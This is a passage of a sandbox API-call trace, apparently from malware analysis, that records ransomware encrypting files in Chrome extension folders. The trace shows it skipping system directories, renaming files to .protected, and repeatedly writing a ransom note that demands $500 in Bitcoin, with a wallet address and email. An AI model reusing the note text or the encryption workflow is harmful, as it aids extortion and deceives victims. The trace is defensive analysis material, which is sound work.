halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.377] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json") returned 155 [0080.377] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.377] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json") returned 155 [0080.377] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.377] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json") returned 155 [0080.377] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.377] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xad, lpOverlapped=0x0) returned 1 [0080.378] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff53, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.378] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xad, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xad, lpOverlapped=0x0) returned 1 [0080.378] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.378] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.378] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.379] CloseHandle (hObject=0x168) returned 1 [0080.379] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json.protected") returned 165 [0080.379] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json.protected")) returned 1 [0080.380] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.380] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.380] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\RESTORE_FILES.txt") returned 159 [0080.380] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.380] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.380] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.381] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.381] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.381] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.381] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.382] CloseHandle (hObject=0x164) returned 1 [0080.382] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.382] lstrcmpiW (lpString1="da", lpString2="Windows") returned -1 [0080.382] lstrcmpiW (lpString1="da", lpString2="Program Files") returned -1 [0080.382] lstrcmpiW (lpString1="da", lpString2="Program Files (x86)") returned -1 [0080.382] lstrcmpiW (lpString1="da", lpString2="$Recycle.bin") returned 1 [0080.382] lstrcmpiW (lpString1="da", lpString2="System Volume Information") returned -1 [0080.382] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da") returned 141 [0080.382] lstrcmpW (lpString1="da", lpString2=".") returned 1 [0080.382] lstrcmpW (lpString1="da", lpString2="..") returned 1 [0080.382] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\*") returned 143 [0080.382] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.383] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.383] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.383] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.383] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.383] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.383] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\.") returned 143 [0080.383] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.383] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.383] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.383] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.383] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.383] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.383] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.383] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\..") returned 144 [0080.383] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.383] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.383] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.384] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.384] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.384] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.384] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.384] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.384] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json") returned 155 [0080.384] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.384] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.384] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.384] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.384] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.384] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json") returned 155 [0080.384] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.384] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json") returned 155 [0080.385] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.385] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json") returned 155 [0080.385] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.385] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xac, lpOverlapped=0x0) returned 1 [0080.386] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff54, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.386] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xac, lpOverlapped=0x0) returned 1 [0080.386] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.386] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.386] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.386] CloseHandle (hObject=0x168) returned 1 [0080.387] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json.protected") returned 165 [0080.387] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\messages.json.protected")) returned 1 [0080.388] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.388] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.388] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\RESTORE_FILES.txt") returned 159 [0080.388] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.388] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.389] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.390] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.390] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.390] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.390] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.390] CloseHandle (hObject=0x164) returned 1 [0080.390] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.390] lstrcmpiW (lpString1="de", lpString2="Windows") returned -1 [0080.390] lstrcmpiW (lpString1="de", lpString2="Program Files") returned -1 [0080.390] lstrcmpiW (lpString1="de", lpString2="Program Files (x86)") returned -1 [0080.390] lstrcmpiW (lpString1="de", lpString2="$Recycle.bin") returned 1 [0080.390] lstrcmpiW (lpString1="de", lpString2="System Volume Information") returned -1 [0080.390] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de") returned 141 [0080.390] lstrcmpW (lpString1="de", lpString2=".") returned 1 [0080.390] lstrcmpW (lpString1="de", lpString2="..") returned 1 [0080.390] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\*") returned 143 [0080.390] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.391] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.391] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.391] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.391] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.391] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.391] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\.") returned 143 [0080.391] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.391] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.391] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.391] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.391] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.391] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.391] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.391] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\..") returned 144 [0080.391] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.391] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.391] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.391] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.391] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.391] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.391] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.391] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.391] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json") returned 155 [0080.391] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.391] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.391] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.392] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.392] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.392] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 